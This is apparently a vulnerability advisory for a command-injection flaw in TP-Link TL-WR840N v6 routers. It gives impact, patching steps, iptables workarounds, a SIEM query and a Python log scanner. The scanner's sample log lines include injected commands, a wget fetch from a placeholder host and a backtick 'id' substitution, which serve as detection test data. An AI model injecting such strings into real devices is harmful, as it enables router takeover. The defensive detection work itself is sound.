CVE-2020-36178

9.8 CRITICAL

📋 TL;DR

This CVE allows remote attackers to execute arbitrary operating system commands on TP-Link TL-WR840N routers by injecting malicious commands into an IP address field in the web interface. The vulnerability affects users of TP-Link TL-WR840N v6 routers with specific firmware versions. Attackers can gain full control of the device through command injection.

💻 Affected Systems

Products:
  • TP-Link TL-WR840N
Versions: v6 with firmware 0.9.1 4.16 (EU version confirmed)
Operating Systems: Embedded Linux on TP-Link hardware
Default Config Vulnerable: ⚠️ Yes
Notes: The vulnerability exists in the oal_ipt_addBridgeIsolationRules function but similar issues may exist in other functions calling util_execSystem. EU version specifically mentioned but other regional versions may be affected.

⚠️ Risk & Real-World Impact

🔴 Worst Case: Complete compromise of the router allowing attackers to intercept all network traffic, install persistent malware, pivot to internal networks, and use the device as part of a botnet.

🟠 Likely Case: Router takeover enabling traffic interception, DNS hijacking, credential theft, and lateral movement to connected devices.

🟢 If Mitigated: Limited impact if web interface access is restricted and proper network segmentation is implemented.

🌐 Internet-Facing: HIGH - The web interface is typically accessible from WAN by default, making internet-facing devices directly exploitable.
🏢 Internal Only: MEDIUM - Internal attackers with network access can exploit the vulnerability if they reach the web interface.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires access to the web interface, which normally means authenticating first. The vulnerable POST parameter (an IP address field) is passed without validation into an iptables command.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Check TP-Link support for latest firmware

Vendor Advisory: https://www.tp-link.com/fr/support/download/tl-wr840n/v6/#Firmware

Restart Required: Yes

Instructions:

1. Log into the TP-Link support portal.
2. Download the latest firmware for TL-WR840N v6.
3. Access the router web interface.
4. Navigate to System Tools > Firmware Upgrade.
5. Upload and install the new firmware.
6. The router will reboot automatically.

🔧 Temporary Workarounds

Disable Remote Management (platform: all)

Prevent external access to the web interface by disabling remote management features.

Restrict Web Interface Access (platform: linux)

Use firewall rules to limit access to the router's web interface to trusted IP addresses only. Run these on the device itself (if you have shell access) or on an upstream Linux firewall in front of it; rules added from a shell with iptables live only in the running kernel and are lost on reboot unless the firmware saves them.

# Replace TRUSTED_IP with the administrator host's address (or a CIDR block).
# The ACCEPT rules must come before the DROP rules; -A appends, so keep this order.
iptables -A INPUT -p tcp --dport 80 -s TRUSTED_IP -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -s TRUSTED_IP -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j DROP
iptables -A INPUT -p tcp --dport 443 -j DROP

🧯 If You Can't Patch

  • Disable the web interface completely and use alternative management methods
  • Replace affected devices with patched or different models

🔍 How to Verify

Check if Vulnerable:

Check the router firmware version in the web interface under System Tools > Firmware Upgrade. If the version is 0.9.1 4.16 (or another version the vendor lists as vulnerable), the device is affected.

Check Version:

Check the web interface at System Tools > Firmware Upgrade or, if SSH is available, run: cat /proc/version (note that /proc/version reports the kernel build string, not the firmware release, so the web interface is the authoritative source).

Verify Fix Applied:

After firmware update, verify version has changed from vulnerable version. Test that input validation now properly sanitizes IP address fields.

📡 Detection & Monitoring

Log Indicators:

  • Unusual iptables commands in system logs
  • Multiple failed login attempts followed by successful login
  • Unexpected system command execution

Network Indicators:

  • Unusual outbound connections from router
  • DNS queries to suspicious domains
  • Unexpected port scans originating from router

SIEM Query:

source="router_logs" AND ("iptables" OR "system" OR "exec") AND (command="*;*" OR command="*|*" OR command="*`*")
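As an added example (not part of this advisory or of TP-Link's firmware), the following Python script applies the same logic as the query above to constructed sample log lines and goes one step further: it flags logged iptables/system commands that contain shell metacharacters, and also any -s/-d argument that is not a syntactically valid IP address or CIDR block. The log format and the "util_execSystem:" prefix are assumptions.

```python
import ipaddress
import re
from typing import List, Optional

# Constructed sample log lines; the "util_execSystem:" prefix is an assumed
# logging format, not one documented for this device.
SAMPLE_LOGS = [
    "Jan 10 12:00:01 router httpd: util_execSystem: iptables -I FORWARD -s 192.168.0.10 -j DROP",
    "Jan 10 12:00:05 router httpd: util_execSystem: iptables -I FORWARD -s 192.168.0.10;wget http://example.invalid/a -j DROP",
    "Jan 10 12:00:09 router httpd: util_execSystem: iptables -I FORWARD -s `id` -j DROP",
    "Jan 10 12:01:00 router dhcpd: lease 192.168.0.22 renewed",
]

CMD_WORDS = ("iptables", "system", "exec")   # same keywords as the SIEM query
SHELL_META = re.compile(r"[;&|`<>]|\$\(")     # ; & | ` < > and $( substitution
ADDR_FLAGS = {"-s", "-d", "--source", "--destination", "--src", "--dst"}

def is_valid_address(value: str) -> bool:
    """True only for a syntactically valid IPv4/IPv6 address or CIDR block."""
    try:
        ipaddress.ip_network(value, strict=False)
        return True
    except ValueError:
        return False

def address_args(cmd: str) -> List[str]:
    """Values that follow an iptables source/destination flag."""
    tokens = cmd.split()
    return [tokens[i + 1] for i, t in enumerate(tokens[:-1]) if t in ADDR_FLAGS]

def analyze_line(line: str) -> Optional[dict]:
    """Return a finding for a command log line that looks injected, else None."""
    if not any(w in line.lower() for w in CMD_WORDS):
        return None
    cmd = line.split("util_execSystem: ", 1)[-1]
    reasons = []
    if SHELL_META.search(cmd):
        reasons.append("shell metacharacter in command")
    for addr in address_args(cmd):
        if not is_valid_address(addr):
            reasons.append(f"address argument is not an IP/CIDR: {addr!r}")
    return {"line": line, "reasons": reasons} if reasons else None

def scan(lines) -> List[dict]:
    """Findings for every flagged line, in input order."""
    return [f for f in (analyze_line(l) for l in lines) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOGS):
        print(finding["reasons"], "<-", finding["line"])
```

Feed real syslog or SIEM exports into scan() after adjusting the prefix split to match how your device records executed commands.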
